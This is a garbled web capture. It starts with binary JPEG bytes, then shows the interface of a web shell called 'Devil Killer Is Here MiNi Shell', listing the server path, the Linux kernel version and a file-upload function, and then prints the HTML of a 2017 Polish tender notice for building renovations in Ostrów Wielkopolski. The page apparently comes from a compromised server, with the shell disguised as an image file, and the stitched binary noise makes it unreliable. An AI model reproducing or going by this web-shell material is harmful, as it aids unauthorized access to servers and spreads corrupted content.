JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170301/34527-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.mzgm.pl' target='_blank'>http://www.mzgm.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 34527 - 2017
              z dnia 2017-03-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ostrów Wielkopolski: Wykonanie remontów w branży ogólnobudowlanej w budynkach będących w zasobach Miejskiego Zakładu Gospodarki Mieszkaniowej Sp. z o. o. w Ostrowie Wielkopolskim.

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Zakład Gospodarki Mieszkaniowej "MZGM" Sp. z o.o., krajowy numer identyfikacyjny
              25047065700000, ul.
              ul. Kościuszki 
              14,
              63400  
              Ostrów Wielkopolski, woj.
              wielkopolskie, państwo
              Polska, tel.
              627 387 090, e-mail
              mzgm@mzgm.ostrow-wielkopolski.pl, faks
              .
              <br />
              Adres strony internetowej (URL): www.mzgm.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: sp. z o.o.</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.mzgm.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie na adres wskazany poniżej<br />
                Adres:
                <br />Miejski Zakład Gospodarki Mieszkaniowej, ul. Kościuszki 14, 63-400 Ostrów Wlkp.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie remontów w branży ogólnobudowlanej w budynkach będących w zasobach Miejskiego Zakładu Gospodarki Mieszkaniowej Sp. z o. o. w Ostrowie Wielkopolskim.

<br /><b>Numer referencyjny: </b>PNO/02/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b><br /><br /><b>II.5) Główny kod CPV: </b>45210000-2<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów . Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej lub finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące  zdolności technicznej lub zawodowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający uzna warunek za spełniony jeżeli Wykonawca ubiegający się o udzielenie zamówienia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał: 
co najmniej 3 roboty budowlane polegające na remoncie  budynku lub wykonaniu robót wykończeniowych budynku lub budowy budynku o wartości min 20.000,00 zł brutto każda,<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej
Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
Zaświadczenie właściwego naczelnika urzędu skarbowego
Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Zaświadczenie właściwej terenowej jednostki organizacyjnej ZUS lub KRUS
Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej.
Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz robót budowanych
Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Informacja z odpowiedniego rejestru lub inny równoważny dokument
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.
Dokument potwierdzający niezaleganie z opłacaniem podatków przez wykonawcę oraz że nie otwarto jego likwidacji
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.
Wzór oferty na roboty budowlane
Wykaz części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom
Oświadczenie o zatrudnianiu osób na podstawie umowy o pracę

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  0<br />
                Maksymalna liczba wykonawców  0<br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
